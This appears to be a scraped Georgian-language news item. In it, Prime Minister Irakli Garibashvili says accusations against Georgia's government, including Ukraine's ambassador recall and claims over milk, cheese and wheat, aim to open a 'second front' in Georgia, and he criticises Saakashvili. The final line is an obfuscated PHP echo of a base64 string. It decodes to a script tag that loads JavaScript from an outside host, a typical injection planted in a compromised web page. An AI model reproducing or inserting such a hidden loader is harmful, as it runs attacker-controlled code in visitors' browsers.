celsiusi
ავერსი საქკაბელი
საქართველოს პრემიერ-მინისტრმა, ირაკლი ღარიბაშვილმა ჟურნალისტებს განუცხადა, რომ  მთელი ეს აჟიოტაჟი, სკანდალი და უსაფუძვლო ბრალდებები საქართველოს ხელისუფლების მიმართ იყო მიმართული მხოლოდ ერთი მიზნისკენ, რომ რაიმენაირად საქართველოში გახსნილიყო მეორე ფრონტი. 
 
„მას შემდეგ, რაც მე, ჩვენმა გუნდმა მკაფიოდ განვაცხადეთ და ვუთხარით ჩვენს უკრაინელ მეგობრებს, რომ არანაირი მეორე ფრონტი, ომი არ იქნება საქართველოში მას შემდეგ დაიწყო მთელი ეს უსაფუძვლო ბრალდებების კასკადი“ – აღნიშნა ღარიბაშვილმა. 
 
მისივე თქმით, ყველას ახსოვს ჯერ კიდევ ელჩის გაწვევის აბსოლუტურად დაუსაბუთებელი გადაწყვეტილება, შემდეგ რაღაც ბრალდებები რძეზე, ყველზე და ახლა ხორბალზე, ამას დაემატა აღიარება უკრაინის ხელისუფლების უმაღლესი წარმომადგენლების მხრიდან, რომ მათი სურვილი და ამოცანა იყო და არის მოლდოვასა და საქართველოში მეორე ფრონტის გახსნა.
 
„გუშინ ჩვენ ასევე მოვისმინეთ სხვა განცხადებები, რომელიც უკავშირდებოდა ანალოგიურ განზრახვას და სამწუხაროდ, დამწუხრებით მათ მიერ გაკეთებულ განცხადებას, რომ ჩვენ ქართული ხელისუფლება არ ვართ ომისთვის მზად და არ გავაკეთებთ ომს და ამას სააკაშვილი გააკეთებდა. ჩვენ ეს კარგად ვიცით, რომ სააკაშვილმა ყველაზე დიდი გამოუსწორებელი შეცდომა დაუშვა, როცა თავიდან არ აარიდა ჩვენს ხალხს და ჩვენს ქვეყანას ომი." – განაცხადა ღარიბაშვილმა.
 
 
734
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");